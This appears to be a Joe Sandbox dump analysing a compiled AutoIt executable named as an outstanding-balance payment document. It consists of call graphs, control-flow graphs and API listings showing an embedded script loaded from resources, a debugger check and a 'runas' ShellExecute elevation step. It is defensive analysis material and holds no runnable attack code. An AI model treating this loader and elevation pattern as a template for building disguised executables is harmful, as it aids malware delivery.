96730 b6635f 96728->96730 96731 bd1c86 96728->96731 96735 b663fc 48 API calls 96728->96735 96733 bd1c69 96729->96733 96730->96731 96732 b6636c 96730->96732 96736 b66eed 48 API calls 96731->96736 96737 b7c050 48 API calls 96732->96737 96734 b66eed 48 API calls 96733->96734 96738 bd1c77 96734->96738 96739 b66342 96735->96739 96740 bd1ca8 96736->96740 96741 b66384 96737->96741 96742 b663fc 48 API calls 96738->96742 96743 b66eed 48 API calls 96739->96743 96744 b663fc 48 API calls 96740->96744 96746 b71b90 48 API calls 96741->96746 96742->96731 96747 b66350 96743->96747 96745 bd1cb5 96744->96745 96745->96745 96751 b66394 96746->96751 96748 b663fc 48 API calls 96747->96748 96748->96730 96749 b71b90 48 API calls 96749->96751 96751->96749 96752 b663fc 48 API calls 96751->96752 96753 b663d6 Mailbox 96751->96753 96845 b66b68 48 API calls 96751->96845 96752->96751 96753->96630 96755 b640f2 __ftell_nolock 96754->96755 96756 bd370e _memset 96755->96756 96757 b6410b 96755->96757 96760 bd372a GetOpenFileNameW 96756->96760 96758 b6660f 49 API calls 96757->96758 96759 b64114 96758->96759 96888 b640a7 96759->96888 96761 bd3779 96760->96761 96763 b66a63 48 API calls 96761->96763 96765 bd378e 96763->96765 96765->96765 96767 b64129 96906 b64139 96767->96906 96795->96639 96798 b6d7f7 48 API calls 96797->96798 96799 b661db 96798->96799 96800 b66009 96799->96800 96801 b66016 __ftell_nolock 96800->96801 96802 b66a63 48 API calls 96801->96802 96813 b6617c Mailbox 96801->96813 96804 b66048 96802->96804 96807 b6607e Mailbox 96804->96807 96846 b661a6 96804->96846 96805 b661a6 48 API calls 96805->96807 96806 b6614f 96808 b6ce19 48 API calls 96806->96808 96806->96813 96807->96805 96807->96806 96809 b6ce19 48 API calls 96807->96809 96812 b664cf 48 API calls 96807->96812 96807->96813 96810 b66170 96808->96810 96809->96807 96811 b664cf 48 API calls 96810->96811 96811->96813 96812->96807 96813->96684 96815 b641a9 136 API calls 96814->96815 96816 b639fe 96815->96816 96817 b63a06 96816->96817 96849 bac396 96816->96849 96817->96690 96820 bd2ff0 96822 b81c9d _free 47 API calls 96820->96822 96821 b64252 84 API calls 96821->96820 96823 bd2ffd 96822->96823 96824 b64252 84 API calls 96823->96824 96825 bd3006 96824->96825 96825->96825 96827 b7f4ea 48 API calls 96826->96827 96828 b66237 96827->96828 96828->96695 96830 b66406 96829->96830 96831 b6641f 96829->96831 96833 b66eed 48 API calls 96830->96833 96832 b66a63 48 API calls 96831->96832 96834 b662d1 96832->96834 96833->96834 96835 b80fa7 96834->96835 96836 b81028 96835->96836 96837 b80fb3 96835->96837 96887 b8103a 59 API calls 3 library calls 96836->96887 96843 b80fd8 96837->96843 96885 b87c0e 47 API calls __getptd_noexit 96837->96885 96840 b81035 96840->96712 96841 b80fbf 96886 b86e10 8 API calls __cftof_l 96841->96886 96843->96712 96844 b80fca 96844->96712 96845->96751 96847 b6bdfa 48 API calls 96846->96847 96848 b661b1 96847->96848 96848->96804 96850 b64517 83 API calls 96849->96850 96851 bac405 96850->96851 96852 bac56d 94 API calls 96851->96852 96853 bac417 96852->96853 96854 b644ed 64 API calls 96853->96854 96882 bac41b 96853->96882 96855 bac432 96854->96855 96856 b644ed 64 API calls 96855->96856 96857 bac442 96856->96857 96858 b644ed 64 API calls 96857->96858 96859 bac45d 96858->96859 96860 b644ed 64 API calls 96859->96860 96861 bac478 96860->96861 96862 b64517 83 API calls 96861->96862 96863 bac48f 96862->96863 96864 b8395c _W_store_winword 47 API calls 96863->96864 96865 bac496 96864->96865 96866 b8395c _W_store_winword 47 API calls 96865->96866 96867 bac4a0 96866->96867 96868 b644ed 64 API calls 96867->96868 96869 bac4b4 96868->96869 96870 babf5a GetSystemTimeAsFileTime 96869->96870 96871 bac4c7 96870->96871 96872 bac4dc 96871->96872 96873 bac4f1 96871->96873 96876 b81c9d _free 47 API calls 96872->96876 96874 bac556 96873->96874 96875 bac4f7 96873->96875 96879 b81c9d _free 47 API calls 96874->96879 96884 bab965 118 API calls __fcloseall 96875->96884 96877 bac4e2 96876->96877 96880 b81c9d _free 47 API calls 96877->96880 96879->96882 96880->96882 96881 bac54e 96883 b81c9d _free 47 API calls 96881->96883 96882->96820 96882->96821 96883->96882 96884->96881 96885->96841 96886->96844 96887->96840 96889 b8f8a0 __ftell_nolock 96888->96889 96890 b640b4 GetLongPathNameW 96889->96890 96891 b66a63 48 API calls 96890->96891 96892 b640dc 96891->96892 96893 b649a0 96892->96893 96894 b6d7f7 48 API calls 96893->96894 96895 b649b2 96894->96895 96896 b6660f 49 API calls 96895->96896 96897 b649bd 96896->96897 96898 bd2e35 96897->96898 96899 b649c8 96897->96899 96903 bd2e4f 96898->96903 96946 b7d35e 60 API calls 96898->96946 96901 b664cf 48 API calls 96899->96901 96902 b649d4 96901->96902 96940 b628a6 96902->96940 96905 b649e7 Mailbox 96905->96767 96907 b641a9 136 API calls 96906->96907 96908 b6415e 96907->96908 96909 bd3489 96908->96909 96911 b641a9 136 API calls 96908->96911 96910 bac396 122 API calls 96909->96910 96912 bd349e 96910->96912 96913 b64172 96911->96913 96914 bd34bf 96912->96914 96915 bd34a2 96912->96915 96913->96909 96916 b6417a 96913->96916 96919 b64186 96916->96919 96920 bd34aa 96916->96920 96941 b628b8 96940->96941 96945 b628d7 ___crtGetEnvironmentStringsW 96940->96945 96944 b7f4ea 48 API calls 96941->96944 96942 b7f4ea 48 API calls 96943 b628ee 96942->96943 96943->96905 96944->96945 96945->96942 96946->96898 97097 bd19cb 97102 b62322 97097->97102 97099 bd19d1 97135 b80f0a 52 API calls __cinit 97099->97135 97101 bd19db 97103 b62344 97102->97103 97136 b626df 97103->97136 97108 b6d7f7 48 API calls 97109 b62384 97108->97109 97110 b6d7f7 48 API calls 97109->97110 97111 b6238e 97110->97111 97112 b6d7f7 48 API calls 97111->97112 97113 b62398 97112->97113 97114 b6d7f7 48 API calls 97113->97114 97115 b623de 97114->97115 97116 b6d7f7 48 API calls 97115->97116 97117 b624c1 97116->97117 97144 b6263f 97117->97144 97121 b624f1 97122 b6d7f7 48 API calls 97121->97122 97123 b624fb 97122->97123 97173 b62745 97123->97173 97125 b62546 97126 b62556 GetStdHandle 97125->97126 97127 bd501d 97126->97127 97128 b625b1 97126->97128 97127->97128 97130 bd5026 97127->97130 97129 b625b7 CoInitialize 97128->97129 97129->97099 97180 ba92d4 53 API calls 97130->97180 97132 bd502d 97181 ba99f9 CreateThread 97132->97181 97134 bd5039 CloseHandle 97134->97129 97135->97101 97182 b62854 97136->97182 97139 b66a63 48 API calls 97140 b6234a 97139->97140 97141 b6272e 97140->97141 97196 b627ec 6 API calls 97141->97196 97143 b6237a 97143->97108 97145 b6d7f7 48 API calls 97144->97145 97146 b6264f 97145->97146 97147 b6d7f7 48 API calls 97146->97147 97148 b62657 97147->97148 97197 b626a7 97148->97197 97151 b626a7 48 API calls 97152 b62667 97151->97152 97153 b6d7f7 48 API calls 97152->97153 97154 b62672 97153->97154 97155 b7f4ea 48 API calls 97154->97155 97156 b624cb 97155->97156 97157 b622a4 97156->97157 97158 b622b2 97157->97158 97159 b6d7f7 48 API calls 97158->97159 97160 b622bd 97159->97160 97161 b6d7f7 48 API calls 97160->97161 97162 b622c8 97161->97162 97163 b6d7f7 48 API calls 97162->97163 97164 b622d3 97163->97164 97165 b6d7f7 48 API calls 97164->97165 97166 b622de 97165->97166 97167 b626a7 48 API calls 97166->97167 97168 b622e9 97167->97168 97169 b7f4ea 48 API calls 97168->97169 97170 b622f0 97169->97170 97171 bd1fe7 97170->97171 97172 b622f9 RegisterWindowMessageW 97170->97172 97172->97121 97174 bd5f4d 97173->97174 97175 b62755 97173->97175 97202 bac942 50 API calls 97174->97202 97177 b7f4ea 48 API calls 97175->97177 97179 b6275d 97177->97179 97178 bd5f58 97179->97125 97180->97132 97181->97134 97203 ba99df 54 API calls 97181->97203 97189 b62870 97182->97189 97185 b62870 48 API calls 97186 b62864 97185->97186 97187 b6d7f7 48 API calls 97186->97187 97188 b62716 97187->97188 97188->97139 97190 b6d7f7 48 API calls 97189->97190 97191 b6287b 97190->97191 97192 b6d7f7 48 API calls 97191->97192 97193 b62883 97192->97193 97194 b6d7f7 48 API calls 97193->97194 97195 b6285c 97194->97195 97195->97185 97196->97143 97198 b6d7f7 48 API calls 97197->97198 97199 b626b0 97198->97199 97200 b6d7f7 48 API calls 97199->97200 97201 b6265f 97200->97201 97201->97151 97202->97178 97204 bd197b 97209 b7dd94 97204->97209 97208 bd198a 97210 b7f4ea 48 API calls 97209->97210 97211 b7dd9c 97210->97211 97212 b7ddb0 97211->97212 97217 b7df3d 97211->97217 97216 b80f0a 52 API calls __cinit 97212->97216 97216->97208 97218 b7df46 97217->97218 97219 b7dda8 97217->97219 97249 b80f0a 52 API calls __cinit 97218->97249 97221 b7ddc0 97219->97221 97222 b6d7f7 48 API calls 97221->97222 97223 b7ddd7 GetVersionExW 97222->97223 97224 b66a63 48 API calls 97223->97224 97225 b7de1a 97224->97225 97250 b7dfb4 97225->97250 97228 b66571 48 API calls 97230 b7de2e 97228->97230 97232 bd24c8 97230->97232 97254 b7df77 97230->97254 97233 b7dea4 GetCurrentProcess 97263 b7df5f LoadLibraryA GetProcAddress 97233->97263 97235 b7dee3 97257 b7e00c 97235->97257 97236 b7df31 GetSystemInfo 97238 b7df0e 97236->97238 97237 b7debb 97237->97235 97237->97236 97240 b7df21 97238->97240 97241 b7df1c FreeLibrary 97238->97241 97240->97212 97241->97240 97243 b7df29 GetSystemInfo 97246 b7df03 97243->97246 97244 b7def9 97260 b7dff4 97244->97260 97246->97238 97248 b7df09 FreeLibrary 97246->97248 97248->97238 97249->97219 97251 b7dfbd 97250->97251 97252 b6b18b 48 API calls 97251->97252 97253 b7de22 97252->97253 97253->97228 97264 b7df89 97254->97264 97268 b7e01e 97257->97268 97261 b7e00c 2 API calls 97260->97261 97262 b7df01 GetNativeSystemInfo 97261->97262 97262->97246 97263->97237 97265 b7dea0 97264->97265 97266 b7df92 LoadLibraryA 97264->97266 97265->97233 97265->97237 97266->97265 97267 b7dfa3 GetProcAddress 97266->97267 97267->97265 97269 b7def1 97268->97269 97270 b7e027 LoadLibraryA 97268->97270 97269->97243 97269->97244 97270->97269 97271 b7e038 GetProcAddress 97270->97271 97271->97269 97272 bd19ba 97277 b7c75a 97272->97277 97276 bd19c9 97278 b6d7f7 48 API calls 97277->97278 97279 b7c7c8 97278->97279 97285 b7d26c 97279->97285 97282 b7c865 97283 b7c881 97282->97283 97288 b7d1fa 48 API calls ___crtGetEnvironmentStringsW 97282->97288 97284 b80f0a 52 API calls __cinit 97283->97284 97284->97276 97289 b7d298 97285->97289 97288->97282 97290 b7d28b 97289->97290 97291 b7d2a5 97289->97291 97290->97282 97291->97290 97292 b7d2ac RegOpenKeyExW 97291->97292 97292->97290 97293 b7d2c6 RegQueryValueExW 97292->97293 97294 b7d2e7 97293->97294 97295 b7d2fc RegCloseKey 97293->97295 97294->97295 97295->97290 97296 bd9c06 97307 b7d3be 97296->97307 97298 bd9c1c 97306 bd9c91 Mailbox 97298->97306 97316 b61caa 49 API calls 97298->97316 97300 b73200 335 API calls 97301 bd9cc5 97300->97301 97304 bda7ab Mailbox 97301->97304 97318 bacc5c 86 API calls 4 library calls 97301->97318 97303 bd9c71 97303->97301 97317 bab171 48 API calls 97303->97317 97306->97300 97308 b7d3dc 97307->97308 97309 b7d3ca 97307->97309 97311 b7d3e2 97308->97311 97312 b7d40b 97308->97312 97319 b6dcae 50 API calls Mailbox 97309->97319 97314 b7f4ea 48 API calls 97311->97314 97320 b6dcae 50 API calls Mailbox 97312->97320 97315 b7d3d4 97314->97315 97315->97298 97316->97303 97317->97306 97318->97304 97319->97315 97320->97315 97321 b7221a 97322 b7271e 97321->97322 97323 b72223 97321->97323 97331 b71eba Mailbox 97322->97331 97332 b9a58f 48 API calls ___crtGetEnvironmentStringsW 97322->97332 97323->97322 97324 b6936c 81 API calls 97323->97324 97325 b7224e 97324->97325 97325->97322 97326 b7225e 97325->97326 97328 b6b384 48 API calls 97326->97328 97328->97331 97329 bdbe8a 97330 b66eed 48 API calls 97329->97330 97330->97331 97332->97329

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 643 b8b043-b8b080 call b8f8a0 646 b8b089-b8b08b 643->646 647 b8b082-b8b084 643->647 649 b8b0ac-b8b0d9 646->649 650 b8b08d-b8b0a7 call b87bda call b87c0e call b86e10 646->650 648 b8b860-b8b86c call b8a70c 647->648 653 b8b0db-b8b0de 649->653 654 b8b0e0-b8b0e7 649->654 650->648 653->654 657 b8b10b-b8b110 653->657 658 b8b0e9-b8b100 call b87bda call b87c0e call b86e10 654->658 659 b8b105 654->659 661 b8b11f-b8b12d call b93bf2 657->661 662 b8b112-b8b11c call b8f82f 657->662 688 b8b851-b8b854 658->688 659->657 674 b8b44b-b8b45d 661->674 675 b8b133-b8b145 661->675 662->661 678 b8b7b8-b8b7d5 WriteFile 674->678 679 b8b463-b8b473 674->679 675->674 677 b8b14b-b8b183 call b87a0d GetConsoleMode 675->677 677->674 700 b8b189-b8b18f 677->700 681 b8b7e1-b8b7e7 GetLastError 678->681 682 b8b7d7-b8b7df 678->682 684 b8b479-b8b484 679->684 685 b8b55a-b8b55f 679->685 689 b8b7e9 681->689 682->689 686 b8b48a-b8b49a 684->686 687 b8b81b-b8b833 684->687 690 b8b663-b8b66e 685->690 691 b8b565-b8b56e 685->691 693 b8b4a0-b8b4a3 686->693 694 b8b83e-b8b84e call b87c0e call b87bda 687->694 695 b8b835-b8b838 687->695 699 b8b85e-b8b85f 688->699 697 b8b7ef-b8b7f1 689->697 690->687 696 b8b674 690->696 691->687 698 b8b574 691->698 703 b8b4e9-b8b520 WriteFile 693->703 704 b8b4a5-b8b4be 693->704 694->688 695->694 705 b8b83a-b8b83c 695->705 706 b8b67e-b8b693 696->706 708 b8b7f3-b8b7f5 697->708 709 b8b856-b8b85c 697->709 710 b8b57e-b8b595 698->710 699->648 701 b8b199-b8b1bc GetConsoleCP 700->701 702 b8b191-b8b193 700->702 711 b8b440-b8b446 701->711 712 b8b1c2-b8b1ca 701->712 702->674 702->701 703->681 715 b8b526-b8b538 703->715 713 b8b4cb-b8b4e7 704->713 714 b8b4c0-b8b4ca 704->714 705->699 716 b8b699-b8b69b 706->716 708->687 718 b8b7f7-b8b7fc 708->718 709->699 719 b8b59b-b8b59e 710->719 711->708 720 b8b1d4-b8b1d6 712->720 713->693 713->703 714->713 715->697 721 b8b53e-b8b54f 715->721 722 b8b6d8-b8b719 WideCharToMultiByte 716->722 723 b8b69d-b8b6b3 716->723 725 b8b7fe-b8b810 call b87c0e call b87bda 718->725 726 b8b812-b8b819 call b87bed 718->726 727 b8b5de-b8b627 WriteFile 719->727 728 b8b5a0-b8b5b6 719->728 731 b8b36b-b8b36e 720->731 732 b8b1dc-b8b1fe 720->732 721->686 733 b8b555 721->733 722->681 737 b8b71f-b8b721 722->737 734 b8b6b5-b8b6c4 723->734 735 b8b6c7-b8b6d6 723->735 725->688 726->688 727->681 730 b8b62d-b8b645 727->730 739 b8b5b8-b8b5ca 728->739 740 b8b5cd-b8b5dc 728->740 730->697 742 b8b64b-b8b658 730->742 745 b8b370-b8b373 731->745 746 b8b375-b8b3a2 731->746 743 b8b200-b8b215 732->743 744 b8b217-b8b223 call b81688 732->744 733->697 734->735 735->716 735->722 747 b8b727-b8b75a WriteFile 737->747 739->740 740->719 740->727 742->710 749 b8b65e 742->749 750 b8b271-b8b283 call b940f7 743->750 766 b8b269-b8b26b 744->766 767 b8b225-b8b239 744->767 745->746 752 b8b3a8-b8b3ab 745->752 746->752 753 b8b77a-b8b78e GetLastError 747->753 754 b8b75c-b8b776 747->754 749->697 770 b8b289 750->770 771 b8b435-b8b43b 750->771 761 b8b3ad-b8b3b0 752->761 762 b8b3b2-b8b3c5 call b95884 752->762 759 b8b794-b8b796 753->759 754->747 757 b8b778 754->757 757->759 759->689 765 b8b798-b8b7b0 759->765 761->762 768 b8b407-b8b40a 761->768 762->681 776 b8b3cb-b8b3d5 762->776 765->706 772 b8b7b6 765->772 766->750 774 b8b23f-b8b254 call b940f7 767->774 775 b8b412-b8b42d 767->775 768->720 773 b8b410 768->773 777 b8b28f-b8b2c4 WideCharToMultiByte 770->777 771->689 772->697 773->771 774->771 785 b8b25a-b8b267 774->785 775->771 779 b8b3fb-b8b401 776->779 780 b8b3d7-b8b3ee call b95884 776->780 777->771 781 b8b2ca-b8b2f0 WriteFile 777->781 779->768 780->681 788 b8b3f4-b8b3f5 780->788 781->681 784 b8b2f6-b8b30e 781->784 784->771 787 b8b314-b8b31b 784->787 785->777 787->779 789 b8b321-b8b34c WriteFile 787->789 788->779 789->681 790 b8b352-b8b359 789->790 790->771 791 b8b35f-b8b366 790->791 791->779
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cc106b930daf16a3889c4a298858d2560fd2d99bf37a7fbf6baa6629476e362a
                                                          • Instruction ID: d126ee662214a208baa6440b7436d5b2d2ed625f81b75445ed34cb75b9628399
                                                          • Opcode Fuzzy Hash: cc106b930daf16a3889c4a298858d2560fd2d99bf37a7fbf6baa6629476e362a
                                                          • Instruction Fuzzy Hash: D9325F75B022188FDB24AF24DC81AE9B7F5FF46310F1841D9E40AA7A61D7709E81CF52

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00B63AA3,?), ref: 00B63D45
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00B63AA3,?), ref: 00B63D57
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C21148,00C21130,?,?,?,?,00B63AA3,?), ref: 00B63DC8
                                                            • Part of subcall function 00B66430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B63DEE,00C21148,?,?,?,?,?,00B63AA3,?), ref: 00B66471
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,00B63AA3,?), ref: 00B63E48
                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C128F4,00000010), ref: 00BD1CCE
                                                          • SetCurrentDirectoryW.KERNEL32(?,00C21148,?,?,?,?,?,00B63AA3,?), ref: 00BD1D06
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BFDAB4,00C21148,?,?,?,?,?,00B63AA3,?), ref: 00BD1D89
                                                          • ShellExecuteW.SHELL32(00000000,?,?,?,?,00B63AA3), ref: 00BD1D90
                                                            • Part of subcall function 00B63E6E: GetSysColorBrush.USER32(0000000F), ref: 00B63E79
                                                            • Part of subcall function 00B63E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00B63E88
                                                            • Part of subcall function 00B63E6E: LoadIconW.USER32(00000063), ref: 00B63E9E
                                                            • Part of subcall function 00B63E6E: LoadIconW.USER32(000000A4), ref: 00B63EB0
                                                            • Part of subcall function 00B63E6E: LoadIconW.USER32(000000A2), ref: 00B63EC2
                                                            • Part of subcall function 00B63E6E: RegisterClassExW.USER32(?), ref: 00B63F30
                                                            • Part of subcall function 00B636B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B636E6
                                                            • Part of subcall function 00B636B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B63707
                                                            • Part of subcall function 00B636B8: ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B6371B
                                                            • Part of subcall function 00B636B8: ShowWindow.USER32(00000000,?,?,?,?,00B63AA3,?), ref: 00B63724
                                                            • Part of subcall function 00B64FFC: _memset.LIBCMT ref: 00B65022
                                                            • Part of subcall function 00B64FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B650CB
                                                          Strings
                                                          • runas, xrefs: 00BD1D84
                                                          • This is a third-party compiled AutoIt script., xrefs: 00BD1CC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                          • API String ID: 438480954-3287110873
                                                          • Opcode ID: af2e31a8e85ea47e8552a4785958da895bbdc27c56314ff77ca1233824eac25d
                                                          • Instruction ID: b547a9a8023fddc0958caff7393bbc3ede8217c7d61b4e3bc2e85095f3e4bbe9
                                                          • Opcode Fuzzy Hash: af2e31a8e85ea47e8552a4785958da895bbdc27c56314ff77ca1233824eac25d
                                                          • Instruction Fuzzy Hash: FF51D631A04288BACF21ABB4DC41FED7BF5DF25B00F0441E5F95267192DA794A568B31

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1075 b7ddc0-b7de4f call b6d7f7 GetVersionExW call b66a63 call b7dfb4 call b66571 1084 b7de55-b7de56 1075->1084 1085 bd24c8-bd24cb 1075->1085 1088 b7de92-b7dea2 call b7df77 1084->1088 1089 b7de58-b7de63 1084->1089 1086 bd24cd 1085->1086 1087 bd24e4-bd24e8 1085->1087 1091 bd24d0 1086->1091 1092 bd24ea-bd24f3 1087->1092 1093 bd24d3-bd24dc 1087->1093 1104 b7dec7-b7dee1 1088->1104 1105 b7dea4-b7dec1 GetCurrentProcess call b7df5f 1088->1105 1094 bd244e-bd2454 1089->1094 1095 b7de69-b7de6b 1089->1095 1091->1093 1092->1091 1099 bd24f5-bd24f8 1092->1099 1093->1087 1097 bd245e-bd2464 1094->1097 1098 bd2456-bd2459 1094->1098 1100 bd2469-bd2475 1095->1100 1101 b7de71-b7de74 1095->1101 1097->1088 1098->1088 1099->1093 1106 bd247f-bd2485 1100->1106 1107 bd2477-bd247a 1100->1107 1102 bd2495-bd2498 1101->1102 1103 b7de7a-b7de89 1101->1103 1102->1088 1108 bd249e-bd24b3 1102->1108 1109 bd248a-bd2490 1103->1109 1110 b7de8f 1103->1110 1112 b7dee3-b7def7 call b7e00c 1104->1112 1113 b7df31-b7df3b GetSystemInfo 1104->1113 1105->1104 1127 b7dec3 1105->1127 1106->1088 1107->1088 1114 bd24bd-bd24c3 1108->1114 1115 bd24b5-bd24b8 1108->1115 1109->1088 1110->1088 1123 b7df29-b7df2f GetSystemInfo 1112->1123 1124 b7def9-b7df01 call b7dff4 GetNativeSystemInfo 1112->1124 1117 b7df0e-b7df1a 1113->1117 1114->1088 1115->1088 1119 b7df21-b7df26 1117->1119 1120 b7df1c-b7df1f FreeLibrary 1117->1120 1120->1119 1126 b7df03-b7df07 1123->1126 1124->1126 1126->1117 1129 b7df09-b7df0c FreeLibrary 1126->1129 1127->1104 1129->1117
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00B7DDEC
                                                          • GetCurrentProcess.KERNEL32(00000000,00BFDC38,?,?), ref: 00B7DEAC
                                                          • GetNativeSystemInfo.KERNELBASE(?,00BFDC38,?,?), ref: 00B7DF01
                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B7DF0C
                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B7DF1F
                                                          • GetSystemInfo.KERNEL32(?,00BFDC38,?,?), ref: 00B7DF29
                                                          • GetSystemInfo.KERNEL32(?,00BFDC38,?,?), ref: 00B7DF35
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                          • String ID:
                                                          • API String ID: 3851250370-0
                                                          • Opcode ID: 4edc08c28ecb934901ddf4ae6e23897b921504fa98a864c59d411a8f1d4f7347
                                                          • Instruction ID: 8c0d1f828289e17502849d8604ffed0da2acda24c20ccffa21ba767aa43983ac
                                                          • Opcode Fuzzy Hash: 4edc08c28ecb934901ddf4ae6e23897b921504fa98a864c59d411a8f1d4f7347
                                                          • Instruction Fuzzy Hash: 4E618DB180A2C4CBCF16CF6898C15E9BFF4AF39300B1989D9D8599F347D6248909CB66

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1147 b6406b-b64083 CreateStreamOnHGlobal 1148 b64085-b6409c FindResourceExW 1147->1148 1149 b640a3-b640a6 1147->1149 1150 b640a2 1148->1150 1151 bd4f16-bd4f25 LoadResource 1148->1151 1150->1149 1151->1150 1152 bd4f2b-bd4f39 SizeofResource 1151->1152 1152->1150 1153 bd4f3f-bd4f4a LockResource 1152->1153 1153->1150 1154 bd4f50-bd4f6e 1153->1154 1154->1150
                                                          APIs
                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B6449E,?,?,00000000,00000001), ref: 00B6407B
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B6449E,?,?,00000000,00000001), ref: 00B64092
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00B6449E,?,?,00000000,00000001,?,?,?,?,?,?,00B641FB), ref: 00BD4F1A
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00B6449E,?,?,00000000,00000001,?,?,?,?,?,?,00B641FB), ref: 00BD4F2F
                                                          • LockResource.KERNEL32(00B6449E,?,?,00B6449E,?,?,00000000,00000001,?,?,?,?,?,?,00B641FB,00000000), ref: 00BD4F42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: 9cf7b90bc6fe1161afec1e9119198573e0111e53107b08fb0fefaf5392d52831
                                                          • Instruction ID: e264ebba4fa03aca024decbc00995aa9dfb916e73c83654ba07d7ecdf3cf5172
                                                          • Opcode Fuzzy Hash: 9cf7b90bc6fe1161afec1e9119198573e0111e53107b08fb0fefaf5392d52831
                                                          • Instruction Fuzzy Hash: 77112E71200751AFE7218B66EC88F677BB9EBC5B51F14456CF6129B2A0DBB1DC448A20
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00BD2F49), ref: 00BA6CB9
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00BA6CCA
                                                          • FindClose.KERNEL32(00000000), ref: 00BA6CDA
                                                          Memory Dump Source
